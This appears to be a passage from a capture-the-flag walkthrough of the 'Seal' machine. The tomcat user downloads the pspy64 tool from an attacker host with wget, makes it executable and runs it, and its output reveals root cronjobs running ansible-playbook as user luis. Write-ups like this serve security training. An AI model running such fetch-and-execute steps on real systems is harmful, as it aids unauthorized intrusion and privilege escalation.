PSPY
A multiple set of root cronjob processes was discovered
tomcat@seal:/tmp$ wget http://10.10.14.7/pspy64 ; chmod 755 ./pspy64
--2023-04-11 14:48:04-- http://10.10.14.7/pspy64
connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
length: 3104768 (3.0M) [application/octet-stream]
saving to: ‘pspy64’
pspy64 100%[===================================================>] 2.96M 1.60MB/s in 1.9s
2023-04-11 14:48:06 (1.60 MB/s) - ‘pspy64’ saved [3104768/3104768]Delivery complete
tomcat@seal:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
ansible-playbook
One of the root cronjob processes is executing a binary, /usr/bin/ansible-playbook, with the /opt/backups/playbook/run.yml file with privileges of the luis user
Then it followed up by performing a series of executions
This operation is being repeated every minute
Continuing
Delete?
The other root cronjob processes is also removing everything in the /admin/dashboard/uploads directory of the Tomcat instance